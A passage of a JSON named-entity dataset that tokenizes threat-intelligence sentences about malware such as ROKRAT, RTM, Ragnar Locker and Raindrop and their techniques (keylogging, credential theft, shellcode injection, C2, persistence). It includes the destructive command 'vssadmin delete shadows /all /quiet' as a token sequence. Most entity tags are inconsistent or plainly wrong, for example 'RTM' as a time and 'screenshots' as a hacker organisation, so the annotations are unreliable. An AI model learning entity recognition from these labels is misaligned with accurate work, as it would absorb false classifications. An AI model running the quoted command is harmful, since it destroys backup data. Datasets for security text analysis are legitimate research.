"Azure", - "AD", - "environments", - "using", - "the", - "Azure", - "Graph", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ROADTools", - "can", - "enumerate", - "Azure", - "AD", - "users." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Org", - "B-HackOrg", - "B-Org" - ] - }, - { - "tokens": [ - "ROADTools", - "leverages", - "valid", - "cloud", - "credentials", - "to", - "perform", - "enumeration", - "operations", - "using", - "the", - "internal", - "Azure", - "AD", - "Graph", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ROADTools", - "can", - "enumerate", - "Azure", - "AD", - "groups." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Idus", - "I-HackOrg", - "O" - ] - }, - { - "tokens": [ - "ROADTools", - "can", - "enumerate", - "Azure", - "AD", - "applications", - "and", - "service", - "principals." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROADTools", - "can", - "enumerate", - "Azure", - "AD", - "systems", - "and", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROCKBOOT", - "is", - "a", - "Master", - "Boot", - "Record", - "(MBR)", - "bootkit", - "that", - "uses", - "the", - "MBR", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "use", - "the", - "`GetForegroundWindow`", - "and", - "`GetWindowText`", - "APIs", - "to", - "discover", - "where", - "the", - "user", - "is", - "typing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "has", - "an", - "audio", - "capture", - "and", - "eavesdropping", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "has", - "used", - "legitimate", - "social", - "networking", - "sites", - "and", - "cloud", - "platforms", - "(including", - "but", - "not", - "limited", - "to", - "Twitter,", - "Yandex,", - "Dropbox,", - "and", - "Mediafire)", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "extract", - "clipboard", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "steal", - "credentials", - "stored", - "in", - "Web", - "browsers", - "by", - "querying", - "the", - "sqlite", - "database." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "collect", - "host", - "data", - "and", - "specific", - "file", - "types." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "check", - "for", - "debugging", - "tools." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "decrypt", - "strings", - "using", - "the", - "victim's", - "hostname", - "as", - "the", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "relies", - "on", - "a", - "specific", - "victim", - "hostname", - "to", - "execute", - "and", - "decrypt", - "important", - "strings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "send", - "collected", - "files", - "back", - "over", - "same", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "send", - "collected", - "data", - "to", - "cloud", - "storage", - "services", - "such", - "as", - "PCloud." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "request", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "ROKRAT", - "has", - "the", - "ability", - "to", - "gather", - "a", - "list", - "of", - "files", - "and", - "directories", - "on", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "retrieve", - "additional", - "malicious", - "payloads", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "use", - "`SetWindowsHookEx`", - "and", - "`GetKeyNameText`", - "to", - "capture", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "B-Purp" - ] - }, - { - "tokens": [ - "ROKRAT", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "attachment", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "modify", - "the", - "`HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\`", - "registry", - "key", - "so", - "it", - "can", - "bypass", - "the", - "VB", - "object", - "model", - "(VBOM)", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "use", - "a", - "variety", - "of", - "API", - "calls", - "to", - "execute", - "shellcode." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "encrypt", - "data", - "prior", - "to", - "exfiltration", - "by", - "using", - "an", - "RSA", - "public", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "list", - "the", - "current", - "running", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "use", - "`VirtualAlloc`,", - "`WriteProcessMemory`,", - "and", - "then", - "`CreateRemoteThread`", - "to", - "execute", - "shellcode", - "within", - "the", - "address", - "space", - "of", - "`Notepad.exe`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "access", - "the", - "<code>HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData</code>", - "Registry", - "key", - "to", - "obtain", - "the", - "System", - "manufacturer", - "value", - "to", - "identify", - "the", - "machine", - "type." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "capture", - "screenshots", - "of", - "the", - "infected", - "system", - "using", - "the", - "`gdi32`", - "library." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "has", - "been", - "delivered", - "via", - "spearphishing", - "emails", - "that", - "contain", - "a", - "malicious", - "Hangul", - "Office", - "or", - "Microsoft", - "Word", - "document." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "check", - "for", - "VMware-related", - "files", - "and", - "DLLs", - "related", - "to", - "sandboxes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "gather", - "the", - "hostname", - "and", - "the", - "OS", - "version", - "to", - "ensure", - "it", - "doesn’t", - "run", - "on", - "a", - "Windows", - "XP", - "or", - "Windows", - "Server", - "2003", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "collect", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "has", - "used", - "Visual", - "Basic", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "for", - "command", - "and", - "control", - "communication." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROKRAT", - "can", - "steal", - "credentials", - "by", - "leveraging", - "the", - "Windows", - "Vault", - "mechanism." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RTM", - "monitors", - "browsing", - "activity", - "and", - "automatically", - "captures", - "screenshots", - "if", - "a", - "victim", - "browses", - "to", - "a", - "URL", - "matching", - "one", - "of", - "a", - "list", - "of", - "strings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "attempt", - "to", - "run", - "the", - "program", - "as", - "admin,", - "then", - "show", - "a", - "fake", - "error", - "message", - "and", - "a", - "legitimate", - "UAC", - "bypass", - "prompt", - "to", - "the", - "user", - "in", - "an", - "attempt", - "to", - "socially", - "engineer", - "the", - "user", - "into", - "escalating", - "privileges." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "the", - "ability", - "to", - "remove", - "Registry", - "entries", - "that", - "it", - "created", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "collects", - "data", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "samples", - "have", - "been", - "signed", - "with", - "a", - "code-signing", - "certificates." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "used", - "an", - "RSS", - "feed", - "on", - "Livejournal", - "to", - "update", - "a", - "list", - "of", - "encrypted", - "C2", - "server", - "names.", - "RTM", - "has", - "also", - "hidden", - "Pony", - "C2", - "server", - "IP", - "addresses", - "within", - "transactions", - "on", - "the", - "Bitcoin", - "and", - "Namecoin", - "blockchain." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "search", - "for", - "specific", - "strings", - "within", - "browser", - "tabs", - "using", - "a", - "Dynamic", - "Data", - "Exchange", - "mechanism." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "resolved", - "Pony", - "C2", - "server", - "IP", - "addresses", - "by", - "either", - "converting", - "Bitcoin", - "blockchain", - "transaction", - "data", - "to", - "specific", - "octets,", - "or", - "accessing", - "IP", - "addresses", - "directly", - "within", - "the", - "Namecoin", - "blockchain." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-HackOrg", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "delete", - "all", - "files", - "created", - "during", - "its", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "check", - "for", - "specific", - "files", - "and", - "directories", - "associated", - "with", - "virtualization", - "and", - "malware", - "analysis." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "add", - "a", - "certificate", - "to", - "the", - "Windows", - "store." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "record", - "keystrokes", - "from", - "both", - "the", - "keyboard", - "and", - "virtual", - "keyboard." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "relied", - "on", - "users", - "opening", - "malicious", - "email", - "attachments,", - "decompressing", - "the", - "attached", - "archive,", - "and", - "double-clicking", - "the", - "executable", - "within." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "named", - "the", - "scheduled", - "task", - "it", - "creates", - "\"Windows", - "Update\"." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "been", - "delivered", - "as", - "archived", - "Windows", - "executable", - "files", - "masquerading", - "as", - "PDF", - "documents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "delete", - "all", - "Registry", - "entries", - "created", - "during", - "its", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "use", - "the", - "<code>FindNextUrlCacheEntryA</code>", - "and", - "<code>FindFirstUrlCacheEntryA</code>", - "functions", - "to", - "search", - "for", - "specific", - "strings", - "within", - "browser", - "history." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "used", - "Port", - "44443", - "for", - "its", - "VNC", - "module." - ], - "ner_tags": [ - "B-Org", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "strings,", - "network", - "data,", - "configuration,", - "and", - "modules", - "are", - "encrypted", - "with", - "a", - "modified", - "RC4", - "algorithm.", - "RTM", - "has", - "also", - "been", - "delivered", - "to", - "targets", - "as", - "various", - "archive", - "files", - "including", - "ZIP,", - "7-ZIP,", - "and", - "RAR." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RTM", - "can", - "obtain", - "a", - "list", - "of", - "smart", - "card", - "readers", - "attached", - "to", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "obtain", - "information", - "about", - "process", - "integrity", - "levels." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "tries", - "to", - "add", - "a", - "Registry", - "Run", - "key", - "under", - "the", - "name", - "\"Windows", - "Update\"", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "the", - "capability", - "to", - "download", - "a", - "VNC", - "module", - "from", - "command", - "and", - "control", - "(C2)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "runs", - "its", - "core", - "DLL", - "file", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "RTM", - "tries", - "to", - "add", - "a", - "scheduled", - "task", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "RTM", - "can", - "obtain", - "information", - "about", - "security", - "software", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "scan", - "victim", - "drives", - "to", - "look", - "for", - "specific", - "banking", - "software", - "on", - "the", - "machine", - "to", - "determine", - "next", - "actions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "been", - "delivered", - "via", - "spearphishing", - "attachments", - "disguised", - "as", - "PDF", - "documents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "encrypts", - "C2", - "traffic", - "with", - "a", - "custom", - "RC4", - "variant." - ], - "ner_tags": [ - "B-Way", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "obtain", - "the", - "computer", - "name,", - "OS", - "version,", - "and", - "default", - "language", - "identifier." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "obtain", - "the", - "victim", - "username", - "and", - "permissions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "obtain", - "the", - "victim", - "time", - "zone." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "can", - "detect", - "if", - "it", - "is", - "running", - "within", - "a", - "sandbox", - "or", - "other", - "virtualized", - "analysis", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "initiated", - "connections", - "to", - "external", - "domains", - "using", - "HTTPS." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RTM", - "uses", - "the", - "command", - "line", - "and", - "rundll32.exe", - "to", - "execute." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "encrypts", - "files", - "on", - "the", - "local", - "machine", - "and", - "mapped", - "drives", - "prior", - "to", - "displaying", - "a", - "note", - "demanding", - "a", - "ransom." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "attempted", - "to", - "terminate/stop", - "processes", - "and", - "services", - "associated", - "with", - "endpoint", - "security", - "products." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "can", - "delete", - "volume", - "shadow", - "copies", - "using", - "<code>vssadmin", - "delete", - "shadows", - "/all", - "/quiet</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "been", - "delivered", - "as", - "an", - "unsigned", - "MSI", - "package", - "that", - "was", - "executed", - "with", - "<code>msiexec.exe</code>." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "may", - "attempt", - "to", - "connect", - "to", - "removable", - "drives", - "and", - "mapped", - "network", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "used", - "regsvr32.exe", - "to", - "execute", - "components", - "of", - "VirtualBox." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "used", - "VirtualBox", - "and", - "a", - "stripped", - "Windows", - "XP", - "virtual", - "machine", - "to", - "run", - "itself.", - "The", - "use", - "of", - "a", - "shared", - "folder", - "specified", - "in", - "the", - "configuration", - "enables", - "Ragnar", - "Locker", - "to", - "encrypt", - "files", - "on", - "the", - "host", - "operating", - "system,", - "including", - "files", - "on", - "any", - "mapped", - "drives." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "components", - "of", - "VirtualBox." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "used", - "sc.exe", - "to", - "execute", - "a", - "service", - "that", - "it", - "creates." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "attempted", - "to", - "stop", - "services", - "associated", - "with", - "business", - "applications", - "and", - "databases", - "to", - "release", - "the", - "lock", - "on", - "files", - "used", - "by", - "these", - "applications", - "so", - "they", - "may", - "be", - "encrypted." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Before", - "executing", - "malicious", - "code,", - "Ragnar", - "Locker", - "checks", - "the", - "Windows", - "API", - "<code>GetLocaleInfoW</code>", - "and", - "doesn't", - "encrypt", - "files", - "if", - "it", - "finds", - "a", - "former", - "Soviet", - "country." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Area", - "I-Area", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "used", - "cmd.exe", - "and", - "batch", - "scripts", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ragnar", - "Locker", - "has", - "used", - "sc.exe", - "to", - "create", - "a", - "new", - "service", - "for", - "the", - "VirtualBox", - "driver." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Raindrop", - "decrypted", - "its", - "Cobalt", - "Strike", - "payload", - "using", - "an", - "AES-256", - "encryption", - "algorithm", - "in", - "CBC", - "mode", - "with", - "a", - "unique", - "key", - "per", - "sample." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Raindrop", - "encrypted", - "its", - "payload", - "using", - "a", - "simple", - "XOR", - "algorithm", - "with", - "a", - "single-byte", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Raindrop", - "was", - "built", - "to", - "include", - "a", - "modified", - "version", - "of", - "7-Zip", - "source", - "code", - "(including", - "associated", - "export", - "names)", - "and", - "Far", - "Manager", - "source", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Raindrop", - "was", - "installed", - "under", - "names", - "that", - "resembled", - "legitimate", - "Windows", - "file", - "and", - "directory", - "names." - 